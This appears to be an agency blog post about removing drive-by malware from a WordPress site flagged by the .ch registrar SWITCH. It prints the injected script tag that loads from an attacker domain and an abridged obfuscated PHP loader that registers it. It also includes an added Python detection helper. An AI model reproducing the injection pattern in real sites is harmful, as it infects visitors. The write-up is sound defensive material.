How to Remove “Drive-By” Malware & Fix a SWITCH Domain Deactivation Warning
Imagine opening your email on a Friday afternoon, only to find a terrifying message from your domain registrar, SWITCH:
“It has come to our attention that the website [your-domain].ch is being misused for Drive-By… If you have not yet cleaned your website by 17.11.2025 16:42, SWITCH will temporarily deactivate the domain name…”
This is the exact message one of our clients received. They had less than four hours to find and remove a “Drive-By” malware infection or their entire website would be taken offline.
This is the story of how we found the infection, cleaned the site, and saved the domain from deactivation—all before the deadline.
What is a “Drive-By” Warning?
First, let’s break down the warning.
- SWITCH: This is the official registrar for all .ch domains in Switzerland. A warning from them is the most serious alert a Swiss website owner can receive.
- “Drive-By” Misuse: This means the client’s website was hacked to infect its visitors. Simply visiting an infected page could be enough to download malware (like ransomware or spyware) onto a person’s computer without them clicking or downloading anything.
The warning email included a link to a saferinternet.ch status page, which confirmed the problem and provided the first clue.
The Investigation: Finding the Malicious Code
The SaferInternet report gave us the “smoking gun”—a piece of malicious code that was being loaded on the client’s site:
hXXps://www.saferinternet.ch/en/domainstatus/?domain=[your-domain].ch
The report identified a specific “Malicious element”:
<script id="hexagoncontrail-js" src="https://simplecopseholding.com/jWcTAonomVveWlRkcUjN6PF-aopGXJy" type="text/javascript"></script>
This single line of code was the “payload.” It secretly loaded a script from simplecopseholding.com, a domain owned by attackers. This script was responsible for the “Drive-By” infection.
Now we knew what the problem was. The next question was how it got there.
The Source: A “Fake Plugin” in Disguise
The malicious script wasn’t in the website’s theme, posts, or pages. After a full scan of the site’s files, we found the source of the infection: a fake, malicious plugin.
Hackers often hide malware inside files that look like legitimate plugins or themes. In this case, the plugin contained a PHP file with incredibly confusing and unreadable code. This is called obfuscation, and it’s designed to hide the malware from security scanners and developers.
The code was full of nonsense function names like coincidemajesticallywing() and likely_mealy_spirited_ice_cream() to make it hard to analyze.
<?php
function coincidemajesticallywing()
{
// ...a huge block of unreadable, encoded text...
$bestrideimpish = 'VkZod1ZtVkZOWEZhZWtrOQ==...';
// ...more confusing code that decodes the text, layer by layer, into $dearlyvery...
return $dearlyvery; // This variable holds the decoded malware URL
}
// ...several other random-looking, non-functional "junk" functions...
// AND HERE IS THE FINAL ATTACK:
// The handle 'hexagoncontrail' is why the injected tag carries id="hexagoncontrail-js";
// the src argument is whatever URL the decoder function above returns.
wp_register_script('hexagoncontrail', coincidemajesticallywing(), array(), null, false);
Hidden at the very bottom was the line that did all the damage: wp_register_script().
This WordPress function is normally used to add helpful scripts (like for a slider or contact form). Here, the hackers used it to inject their malicious script on every single page of the website. The coincidemajesticallywing() function’s only purpose was to decode and return the malicious simplecopseholding.com URL.
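As an added example (not code from the original post, the client's site or the malware), the following Python helper shows the two checks above in working form: it traces an external script tag in rendered HTML back to the WordPress handle that emitted it, then flags register/enqueue calls in plugin source whose src is computed at runtime rather than given as a plain string. It assumes the id="<handle>-js" convention WordPress uses when printing registered scripts and a hypothetical allowlist of standard WP URL helpers; the sample HTML and PHP are constructed.

```python
# Added example (not from the original post): trace a suspicious <script> tag back
# to the WordPress handle that emitted it, then flag wp_register_script()/
# wp_enqueue_script() calls in plugin source whose src is computed at runtime.
import re
from html.parser import HTMLParser
from urllib.parse import urlparse
class _Scripts(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.tags.append(dict(attrs))
def external_scripts(html, own_host):
    """(handle, host, src) for each <script src> not served from own_host.
    WordPress renders registered scripts as id="<handle>-js", so the id recovers the handle."""
    p = _Scripts(); p.feed(html)
    found = []
    for t in p.tags:
        src = t.get("src") or ""
        host = urlparse(src).netloc.lower()
        if host and host != own_host.lower():
            sid = t.get("id") or ""
            found.append((sid[:-3] if sid.endswith("-js") else None, host, src))
    return found
# Assumed allowlist: standard WP helpers that legitimately build a src URL.
BENIGN_SRC_HELPERS = {"plugins_url", "plugin_dir_url", "includes_url",
                      "get_template_directory_uri", "get_stylesheet_directory_uri"}
_REG = re.compile(
    r"wp_(?:register|enqueue)_script\s*\(\s*(['\"])(?P<handle>[^'\"]+)\1\s*,\s*"
    r"(?:(['\"])(?P<lit>[^'\"]*)\3|(?P<fn>[A-Za-z_]\w*)\s*\(|(?P<other>[^,)]+))")
def suspicious_registrations(php_src):
    """(handle, src expression) for calls whose src is neither a string literal nor a WP helper."""
    hits = []
    for m in _REG.finditer(php_src):
        if m.group("lit") is not None or m.group("fn") in BENIGN_SRC_HELPERS:
            continue  # plain URL string, or a standard path helper: review by eye instead
        expr = m.group("fn") + "()" if m.group("fn") else m.group("other").strip()
        hits.append((m.group("handle"), expr))
    return hits
# Constructed samples, not the client's real page or plugin.
SAMPLE_HTML = ('<script id="jquery-core-js" src="https://example-site.ch/wp-includes/js/jquery.js"></script>'
               '<script id="hexagoncontrail-js" src="https://attacker.example/x.js"></script>')
SAMPLE_PHP = """<?php
function coincidemajesticallywing() { return base64_decode('Y29uc3RydWN0ZWQtc2FtcGxlLWJsb2I='); }
wp_register_script('hexagoncontrail', coincidemajesticallywing(), array(), null, false);
wp_enqueue_script('my-slider', plugins_url('slider.js', __FILE__), array('jquery'));
wp_register_script('legit', 'https://example-site.ch/wp-content/plugins/ok/ok.js');
wp_enqueue_script('var-src', $src);
"""
```

Run `external_scripts` on the saved HTML of an infected page to get the handle, then `suspicious_registrations` over every .php file under wp-content/ to find the file that registers it.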
The Solution: Clean-up and Prevention
With the source of the infection found, the fix was fast:
- Removal: We immediately deleted the entire fake plugin and all its files.
- Verification: We cleared the website’s cache (WP-Rocket, server-side, etc.) and re-scanned the site. The malicious <script> was gone.
- Reporting: We used the saferinternet.ch portal to request a re-scan. The site passed, and the deactivation warning was lifted—well before the 4-hour deadline.
After the immediate threat was gone, we performed a full security “hardening” to prevent this from happening again:
- Updated all plugins, themes, and WordPress core.
- Changed all admin passwords.
- Installed a Web Application Firewall (WAF) to block future attacks.
- Scanned the entire site for any other “backdoors” the hackers might have left.
How to Protect Your Site from a “Drive-By” Hack
This was a high-stress situation, but it’s one you can avoid.
- Keep Everything Updated: This is the #1 way to stay safe. Hackers almost always get in through old, vulnerable plugins or themes.
- Use Strong Passwords: Use a password manager. Never use “admin” as a username.
- Never Use “Nulled” or Pirated Plugins: A “free” premium plugin from an unofficial site is the most common way to get this exact type of malware. This is very likely how the client’s site was infected in the first place.
- Install a Security Plugin: A good security plugin (like Wordfence or Sucuri) can scan your files and block many attacks before they happen.
Receiving a “domain deactivation” notice is one of the scariest emails you can get. But by acting quickly and methodically, we were able to find the needle in the haystack and get the client’s site clean and safe.
Have you ever received a warning like this? If you’re facing a website security issue and don’t know where to start, feel free to contact us for an emergency clean-up.
